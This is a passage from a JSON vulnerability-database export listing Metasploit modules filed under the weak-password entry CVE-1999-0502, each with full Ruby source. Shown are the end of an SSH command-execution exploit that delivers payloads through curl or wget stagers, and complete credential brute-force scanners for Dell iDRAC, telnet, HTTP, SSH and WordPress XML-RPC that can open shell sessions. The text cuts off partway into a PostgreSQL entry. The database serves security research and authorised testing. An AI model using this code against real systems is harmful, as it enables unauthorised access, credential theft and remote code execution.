ARCH_X64,\n 'Platform' => 'osx',\n 'CmdStagerFlavor' => %w[curl wget]\n }\n ],\n [\n 'BSD x86',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'bsd',\n 'CmdStagerFlavor' => %w[printf curl wget]\n }\n ],\n [\n 'BSD x64',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'bsd',\n 'CmdStagerFlavor' => %w[printf curl wget]\n }\n ],\n [\n 'Python',\n {\n 'Arch' => ARCH_PYTHON,\n 'Platform' => 'python'\n }\n ],\n [\n 'Unix Cmd',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n # For the CVE\n 'DisclosureDate' => 'Jan 01 1999',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]),\n Opt::RHOST(),\n Opt::RPORT(22)\n ]\n )\n\n register_advanced_options(\n [\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])\n ]\n )\n end\n\n def execute_command(cmd, opts = {})\n vprint_status(\"Executing #{cmd}\")\n begin\n Timeout.timeout(3.5) { ssh_socket.exec!(cmd) }\n rescue Timeout::Error\n print_warning('Timed out while waiting for command to return')\n @timeout = true\n end\n end\n\n def do_login(ip, user, pass, port)\n factory = ssh_socket_factory\n opt_hash = {\n :auth_methods => ['password', 'keyboard-interactive'],\n :port => port,\n :use_agent => false,\n :config => false,\n :password => pass,\n :proxy => factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n\n opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']\n\n begin\n self.ssh_socket = Net::SSH.start(ip, user, opt_hash)\n rescue Rex::ConnectionError\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\n rescue Net::SSH::Disconnect, ::EOFError\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\n rescue Net::SSH::AuthenticationFailed\n fail_with(Failure::NoAccess, 'Failed authentication')\n rescue Net::SSH::Exception => e\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\n end\n\n fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket\n end\n\n def exploit\n do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])\n print_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...\")\n\n case target['Platform']\n when 'python'\n execute_command(\"python -c \\\"#{payload.encoded}\\\"\")\n when 'unix'\n execute_command(payload.encoded)\n else\n execute_cmdstager(linemax: 500)\n end\n\n @timeout ? ssh_socket.shutdown! : ssh_socket.close\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ssh/sshexec.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-15T20:55:28", "description": "This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85\n", "edition": 2, "cvss3": {}, "published": "2012-09-27T06:33:11", "type": "metasploit", "title": "Dell iDRAC Default Login", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/DELL_IDRAC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Dell iDRAC Default Login',\n 'Description' => %q{\n This module attempts to login to a iDRAC webserver instance using\n default username and password. Tested against Dell Remote Access\n Controller 6 - Express version 1.50 and 1.85\n },\n 'Author' =>\n [\n 'Cristiano Maruti <cmaruti[at]gmail.com>'\n ],\n 'References' =>\n [\n ['CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path to the iDRAC Administration page', '/data/login']),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"idrac_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"idrac_default_pass.txt\") ]),\n OptInt.new('RPORT', [true, \"Default remote port\", 443])\n ])\n\n register_advanced_options([\n OptBool.new('SSL', [true, \"Negotiate SSL connection\", true])\n ])\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n uri = normalize_uri(datastore['URI'])\n \"#{proto}://#{vhost}:#{rport}#{uri}\"\n end\n\n def do_login(user=nil, pass=nil)\n\n uri = normalize_uri(target_uri.path)\n auth = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'SSL' => true,\n 'vars_post' => {\n 'user' => user,\n 'password' => pass\n }\n })\n\n if(auth and auth.body.to_s.match(/<authResult>[0|5]<\\/authResult>/) != nil )\n print_good(\"#{target_url} - SUCCESSFUL login for user '#{user}' with password '#{pass}'\")\n report_cred(\n ip: rhost,\n port: rport,\n service_name: (ssl ? 'https' : 'http'),\n user: user,\n password: pass,\n proof: auth.body.to_s\n )\n return :next_user\n else\n print_error(\"#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'\")\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run_host(ip)\n print_status(\"Verifying that login page exists at #{ip}\")\n uri = normalize_uri(target_uri.path)\n begin\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)\n print_status(\"Attempting authentication\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n\n elsif (res and res.code == 301)\n print_error(\"#{target_url} - Page redirect to #{res.headers['Location']}\")\n return :abort\n else\n print_error(\"The iDRAC login page does not exist at #{ip}\")\n return :abort\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n rescue ::OpenSSL::SSL::SSLError => e\n return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dell_idrac.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-09T05:57:20", "description": "This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.\n", "edition": 2, "cvss3": {}, "published": "2012-03-18T05:07:27", "type": "metasploit", "title": "Telnet Login Check Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/TELNET/TELNET_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/telnet'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n\n def initialize\n super(\n 'Name' => 'Telnet Login Check Scanner',\n #\n 'Description' => %q{\n This module will test a telnet login on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n },\n 'Author' => 'egypt',\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_advanced_options(\n [\n OptInt.new('TIMEOUT', [ true, 'Default timeout for telnet connections.', 25])\n ], self.class\n )\n\n deregister_options('USERNAME','PASSWORD', 'PASSWORD_SPRAY')\n\n @no_pass_prompt = []\n end\n\n attr_accessor :no_pass_prompt\n attr_accessor :password_only\n\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::Telnet.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['Timeout'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n banner_timeout: datastore['TelnetBannerTimeout'],\n telnet_timeout: datastore['TelnetTimeout'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_data[:private_type] = :password\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner) if datastore['CreateSession']\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n disconnect(scanner.sock)\n end\n end\n end\n\n def start_telnet_session(host, port, user, pass, scanner)\n print_status \"Attempting to start session #{host}:#{port} with #{user}:#{pass}\"\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => user,\n 'PASSWORD' => pass\n }\n\n start_session(self, \"TELNET #{user}:#{pass} (#{host}:#{port})\", merge_me, true, scanner.sock)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/telnet/telnet_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-17T22:13:27", "description": "This module attempts to authenticate to an HTTP service.\n", "edition": 2, "cvss3": {}, "published": "2014-06-19T19:12:21", "type": "metasploit", "title": "HTTP Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/HTTP/HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/http'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP Login Utility',\n 'Description' => 'This module attempts to authenticate to an HTTP service.',\n 'Author' => [ 'hdm' ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE,\n # See https://github.com/rapid7/metasploit-framework/issues/3811\n #'DefaultOptions' => {\n # 'USERPASS_FILE' => File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_userpass.txt\"),\n # 'USER_FILE' => File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_users.txt\"),\n # 'PASS_FILE' => File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\"),\n #}\n )\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [ false, \"File containing users and passwords separated by space, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_userpass.txt\") ]),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_users.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n OptString.new('AUTH_URI', [ false, \"The URI to authenticate against (default:auto)\" ]),\n OptString.new('REQUESTTYPE', [ false, \"Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)\", \"GET\" ])\n ])\n register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])\n\n deregister_options('USERNAME', 'PASSWORD', 'PASSWORD_SPRAY')\n end\n\n def to_uri(uri)\n begin\n # In case TARGETURI is empty, at least we default to '/'\n uri = \"/\" if uri.blank?\n URI(uri)\n rescue ::URI::InvalidURIError\n raise RuntimeError, \"Invalid URI: #{uri}\"\n end\n end\n\n def find_auth_uri\n if datastore['AUTH_URI'].present?\n paths = [datastore['AUTH_URI']]\n else\n paths = %W{\n /\n /admin/\n /auth/\n /manager/\n /Management.asp\n /ews/\n }\n end\n\n paths.each do |path|\n uri = ''\n\n begin\n uri = to_uri(path)\n rescue RuntimeError => e\n # Bad URI so we will not try to request it\n print_error(e.message)\n next\n end\n\n uri = normalize_uri(uri.path)\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => datastore['REQUESTTYPE'],\n 'username' => '',\n 'password' => ''\n }, 10)\n\n next unless res\n if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/\n path = res.headers['Location']\n vprint_status(\"Following redirect: #{path}\")\n res = send_request_cgi({\n 'uri' => path,\n 'method' => datastore['REQUESTTYPE'],\n 'username' => '',\n 'password' => ''\n }, 10)\n next if not res\n end\n next unless res.code == 401\n\n return path\n end\n\n return nil\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{vhost}:#{rport}#{@uri.to_s}\"\n end\n\n def run_host(ip)\n if (datastore['REQUESTTYPE'] == \"PUT\") && (datastore['AUTH_URI'].blank?)\n print_error(\"You need need to set AUTH_URI when using PUT Method !\")\n return\n end\n\n extra_info = \"\"\n if rhost != vhost\n extra_info = \" (#{rhost})\"\n end\n\n @uri = find_auth_uri\n if ! @uri\n print_error(\"#{target_url}#{extra_info} No URI found that asks for HTTP authentication\")\n return\n end\n\n @uri = \"/#{@uri}\" if @uri[0,1] != \"/\"\n\n print_status(\"Attempting to login to #{target_url}#{extra_info}\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['HttpPassword'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['HttpUsername'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::HTTP.new(\n configure_http_login_scanner(\n uri: @uri,\n method: datastore['REQUESTTYPE'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5\n )\n )\n\n msg = scanner.check_setup\n if msg\n print_brute :level => :error, :ip => ip, :msg => \"Verification failed: #{msg}\"\n return\n end\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\"\n credential_data[:private_type] = :password\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Could not connect\"\n end\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n end\n invalidate_login(credential_data)\n end\n end\n\n end\n\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/http_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-24T00:10:53", "description": "This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.\n", "edition": 2, "cvss3": {}, "published": "2014-10-21T18:06:35", "type": "metasploit", "title": "SSH Login Check Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2020-06-21T20:21:40", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/ssh'\nrequire 'net/ssh/command_stream'\nrequire 'metasploit/framework/login_scanner/ssh'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::CommandShell\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::SSH::Options\n\n def initialize\n super(\n 'Name' => 'SSH Login Check Scanner',\n 'Description' => %q{\n This module will test ssh logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n },\n 'Author' => ['todb'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors\n )\n\n register_options(\n [\n Opt::RPORT(22)\n ], self.class\n )\n\n register_advanced_options(\n [\n Opt::Proxies,\n OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),\n OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', true])\n ]\n )\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def rport\n datastore['RPORT']\n end\n\n def session_setup(result, scanner)\n return unless scanner.ssh_socket\n\n # Create a new session\n conn = Net::SSH::CommandStream.new(scanner.ssh_socket)\n\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => result.credential.public,\n 'PASSWORD' => result.credential.private\n }\n info = \"#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})\"\n s = start_session(self, info, merge_me, false, conn.lsock)\n self.sockets.delete(scanner.ssh_socket.transport.socket)\n\n # Set the session platform\n s.platform = scanner.get_platform(result.proof)\n\n # Create database host information\n host_info = {host: scanner.host}\n\n unless s.platform == 'unknown'\n host_info[:os_name] = s.platform\n end\n\n report_host(host_info)\n\n s\n end\n\n\n def run_host(ip)\n @ip = ip\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::SSH.new(\n host: ip,\n port: rport,\n cred_details: cred_collection,\n proxies: datastore['Proxies'],\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['SSH_TIMEOUT'],\n framework: framework,\n framework_module: self,\n skip_gather_proof: !datastore['GatherProof']\n )\n\n scanner.verbosity = :debug if datastore['SSH_DEBUG']\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}'\"\n credential_data[:private_type] = :password\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n session_setup(result, scanner) if datastore['CreateSession']\n if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'\n msg = \"While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with\"\n msg << \" 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with\"\n msg << \" device details so it can be handled in the future.\"\n print_brute :level => :error, :ip => ip, :msg => msg\n end\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute :level => :verror, :ip => ip, :msg => \"Could not connect: #{result.proof}\"\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n else\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-15T22:56:35", "description": "This module attempts to authenticate against a Wordpress-site (via XMLRPC) using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n", "edition": 2, "cvss3": {}, "published": "2014-07-25T13:24:09", "type": "metasploit", "title": "Wordpress XML-RPC Username/Password Login Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_XMLRPC_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/wordpress_rpc'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Wordpress XML-RPC Username/Password Login Scanner',\n 'Description' => '\n This module attempts to authenticate against a Wordpress-site\n (via XMLRPC) using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n ',\n 'Author' =>\n [\n 'Cenk Kalpakoglu <cenk.kalpakoglu[at]gmail.com>',\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://wordpress.org/'],\n ['URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],\n ['CVE', '1999-0502'] # Weak password\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(80),\n ])\n\n deregister_options('BLANK_PASSWORDS', 'PASSWORD_SPRAY') # we don't need these options\n end\n\n def run_host(ip)\n print_status(\"#{peer}:#{wordpress_url_xmlrpc} - Sending Hello...\")\n if wordpress_xmlrpc_enabled?\n vprint_good(\"XMLRPC enabled, Hello message received!\")\n else\n print_error(\"XMLRPC is not enabled! Aborting\")\n return :abort\n end\n\n print_status(\"Starting XML-RPC login sweep...\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n scanner = Metasploit::Framework::LoginScanner::WordpressRPC.new(\n configure_http_login_scanner(\n uri: wordpress_url_xmlrpc,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\"\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Could not connect\"\n end\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n end\n invalidate_login(credential_data)\n end\n end\n\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-06T21:49:17", "description": "This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.\n", "edition": 2, "cvss3": {}, "published": "2010-04-26T22:23:37", "type": "metasploit", "title": "PostgreSQL Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 